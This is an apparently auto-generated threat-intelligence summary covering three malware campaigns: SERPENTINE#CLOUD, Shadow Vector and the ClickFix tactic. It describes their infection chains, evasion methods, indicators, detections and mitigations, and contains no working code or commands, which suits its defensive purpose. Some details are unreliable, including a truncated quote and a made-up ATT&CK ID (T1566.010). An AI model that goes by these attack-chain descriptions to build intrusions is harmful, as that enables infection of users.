Full Report
A new campaign is making use of Cloudflare Tunnel subdomains to host malicious payloads and deliver them via malicious attachments embedded in phishing emails. The ongoing campaign has been codenamed SERPENTINE#CLOUD by Securonix. It leverages "the Cloudflare Tunnel infrastructure and Python-based loaders to deliver memory-injected payloads through a chain of shortcut files and obfuscated
Analysis Summary
# Tool/Technique: SERPENTINE#CLOUD Campaign
## Overview
SERPENTINE#CLOUD is the codename for an ongoing phishing campaign that utilizes Cloudflare Tunnel subdomains to host malicious payloads. The campaign employs a multi-step infection chain involving LNK shortcut files, obfuscated scripts, and memory injection, culminating in the deployment of remote access trojans.
## Technical Details
- Type: Campaign / Attack Chain leveraging multiple tools
- Platform: Windows
- Capabilities: Phishing delivery, execution via LNK files, multi-stage payload loading, memory injection, evasion of traditional blocking mechanisms.
- First Seen: The article mentions a variation was documented last year, with the current iteration being actively analyzed.
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment
- T1204 - User Execution
- T1204.002 - Malicious File
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (Leveraging batch files)
- T1059.005 - Visual Basic
- T1027 - Obfuscated Files or Information
- T1027.004 - Deobfuscation via Custom Code
- T1055 - Process Injection
- T1055.012 - Process Injection: Native API
- T1573 - Encrypted Channel
- T1573.002 - Asymmetric Encryption (Implied by use of Cloudflare Tunnel for encrypted transport)
## Functionality
### Core Capabilities
- Initial access via payment/invoice-themed phishing emails containing zipped documents with LNK files.
- Utilization of legitimate Cloudflare Tunnel subdomains for hosting payloads and C2 communication.
- Downloading next-stage payloads (WSF, then batch script) from a remote WebDAV share hosted on Cloudflare Tunnel sites.
- Execution chain involving `cscript.exe` launching a VBScript-based loader (WSF) which then runs a batch file (`kiki.bat`).
### Advanced Features
- **Memory Injection:** Final payloads (like AsyncRAT or Revenge RAT) are Donut-loaded entirely into memory, avoiding disk-based detection.
- **Evasion:** Leveraging legitimate, trusted cloud infrastructure (Cloudflare Tunnel) makes domain/URL blocking exceedingly difficult.
- **Anti-AV Check:** The batch script specifically checks for the presence of antivirus software before proceeding.
- **LLM Vibe-Coding:** The presence of well-defined comments suggests the script might have been generated using a Large Language Model.
## Indicators of Compromise
- File Hashes: [Not specified in the context]
- File Names: LNK files (disguised as documents), `kiki.bat`
- Registry Keys: [Not specified in the context]
- Network Indicators: Payloads retrieved over WebDAV from subdomains hosted on `*.trycloudflare[.]com`.
- Behavioral Indicators: Execution of WSF via `cscript.exe`, batch script executing Python payloads, memory execution of Donut-packed code.
## Associated Threat Actors
- Unknown (Identity presently unknown, but noted for English fluency).
- Associated with past exploitation of AsyncRAT, GuLoader, PureLogs Stealer, Remcos RAT, Venom RAT, and XWorm in prior related campaigns.
## Detection Methods
- Signature-based detection: Signatures for specific malicious file hashes (if available) or the Donut loader artifacts in memory.
- Behavioral detection: Monitoring for `cscript.exe` or `wscript.exe` initiating complex execution chains, unexpected network connections from office applications, or Python scripts executing high-entropy shellcode.
- YARA rules: Rules targeting known shellcode or Python loader characteristics.
## Mitigation Strategies
- Prevention measures: Email filtering tuned to block suspicious attachments or links from known Cloudflare Tunnel ranges if possible, though this is challenging.
- Hardening recommendations: Implement application control to restrict execution of scripts (WSF, BAT) or Python from unusual directories, enforce strong LNK file scanning, and deploy advanced endpoint protection capable of detecting in-memory payloads.
## Related Tools/Techniques
- AsyncRAT (Payload)
- Revenge RAT (Payload)
- GuLoader (Stager used in prior variations)
- Donut loader (Loader used for memory injection)
- Living-off-the-land techniques (Use of inherent Windows scripting hosts)
---
# Tool/Technique: Shadow Vector Campaign
## Overview
Shadow Vector is a malware campaign identified by Acronis that specifically targets users in Colombia, primarily using booby-trapped Scalable Vector Graphics (SVG) files delivered via phishing emails impersonating court notifications. The campaign ultimately deploys RATs or utilizes a .NET loader associated with stealer malware.
## Technical Details
- Type: Campaign / Attack Chain
- Platform: Windows
- Capabilities: Phishing delivery using SVG smuggling, hosting payloads on public file-sharing services (Internet Archive, Bitbucket, Dropbox, Discord, YDRAY), memory-resident execution via modular loader.
- First Seen: Current active campaign (Timestamped relative to the article date).
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment
- T1027 - Obfuscated Files or Information
- T1027.017 - SVG Smuggling (Key technique used for delivery)
- T1140 - Deobfuscate/Decode Files or Information (Implied by embedding Base64 payloads in SVG)
- T1574 - Hijack Execution Flow
- T1574.002 - DLL Side-Loading (Malicious DLLs loaded by legitimate executables in download archives)
- T1055 - Process Injection
- (Implied by memory-resident loader executing payloads dynamically)
## Functionality
### Core Capabilities
- Spear-phishing emails impersonating trusted Colombian institutions (court notifications).
- Infection triggered via SVG decoys with embedded links to JS/VBS stagers on public platforms, *or* password-protected ZIP files containing payloads.
- Payloads hidden in Base64-encoded text within SVG images hosted on the Internet Archive.
### Advanced Features
- **DLL Sideloading:** Download archives contain legitimate executables alongside malicious DLLs, which are sideloaded.
- **Modular Memory-Resident Loader:** The threat actor uses a loader capable of executing payloads entirely in memory, minimizing disk residue.
- **Cross-Regional TTP similarity:** Presence of Portuguese-language strings/method parameters suggests potential code reuse or collaboration with actors targeting Brazilian users.
## Indicators of Compromise
- File Hashes: [Not specified in the context]
- File Names: SVG decoys, JS/VBS stagers, password-protected ZIP archives.
- Registry Keys: [Not specified in the context]
- Network Indicators: Payloads hosted on Internet Archive, Bitbucket, Dropbox, Discord, YDRAY (defanged: internetarchive[.]org, bitbucket[.]org, dropbox[.]com, discord[.]com, ydray[.]com)
- Behavioral Indicators: Execution of JS/VBS stagers, DLL sideloading events, memory execution of non-file-backed code.
## Associated Threat Actors
- Unknown (Associated with observed TTPs similar to Brazilian banking malware).
- Known payloads include AsyncRAT and Remcos RAT; recent variants used a .NET loader associated with Katz Stealer.
## Detection Methods
- Signature-based detection: Signatures for known AsyncRAT/Remcos binaries or the .NET loader associated with Katz Stealer.
- Behavioral detection: Detection of SVG files containing suspiciously large or encoded strings (Base64), or processes attempting DLL sideloading.
- YARA rules: Rules targeting file formats attempting to abuse SVG for staging or rules targeting known memory loader structures.
## Mitigation Strategies
- Prevention measures: Strict email gateway rules blocking domains known for file sharing if possible, or high scrutiny on ZIP archives from unknown senders.
- Hardening recommendations: Strong user training regarding finance/legal document lookalikes, enabling macro/script blocking in Office, and ensuring robust endpoint detection focused on process monitoring (especially DLL loading).
## Related Tools/Techniques
- AsyncRAT (RAT)
- Remcos RAT (RAT)
- Katz Stealer (.NET loader associated with)
- SVG Smuggling (Delivery technique)
---
# Tool/Technique: ClickFix Tactic
## Overview
ClickFix is a social engineering tactic where attackers trick targets into performing seemingly necessary, mundane actions (like completing a CAPTCHA verification or fixing an issue) which results in the download and execution of malware, often stealers or RATs.
## Technical Details
- Type: Social Engineering Technique
- Platform: Multi-platform (Execution context often targets Windows/User interaction)
- Capabilities: Exploits user habituation to benign actions (CAPTCHAs), leading to drive-by downloads and initial payload execution without relying on traditional technical vulnerability exploitation.
- First Seen: The article notes a surge between March and May 2025.
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Often delivered via phishing leading to the "fix")
- T1204 - User Execution
- T1204.002 - Malicious File
- T1566.010 - Phishing: Drive-by Compromise (Described as central to drive-by downloads)
## Functionality
### Core Capabilities
- Deceiving targets into executing actions that look like routine web maintenance or necessary verification steps.
- Shifting attacker focus from exploiting software flaws to exploiting user errors.
### Advanced Features
- **Simplicity and Success Rate:** Highly effective due to its low complexity and reliance on common user behavior patterns (universal applicability).
- **Self-Infection:** Users perform the critical step of initiating the infection process themselves.
## Indicators of Compromise
- File Hashes: [Not specified in the context]
- File Names: Varies based on dropped payload (often disguised installers/fixers)
- Registry Keys: [Not specified in the context]
- Network Indicators: Connections fetching payloads from external, often ephemeral, resources.
- Behavioral Indicators: User interaction leading directly to unexpected file downloads or executions immediately post-interaction.
## Associated Threat Actors
- Various actors deploying Lumma Stealer and SectopRAT are leveraging this tactic.
## Detection Methods
- Signature-based detection: Not easily signatured as it's a behavior.
- Behavioral detection: Tracking processes initiated immediately following user interaction with seemingly harmless web elements or notifications.
- YARA rules: [Not applicable for a pure social engineering tactic]
## Mitigation Strategies
- Prevention measures: Implement strong application control policies to limit what users can execute.
- Hardening recommendations: Increase user training frequency focusing on unsolicited notifications requiring immediate action, especially those related to "fixing" files or CAPTCHA verification outside of known, trusted sites.
## Related Tools/Techniques
- Lumma Stealer (Associated Payload)
- SectopRAT (Associated Payload)
- Drive-by Compromise techniques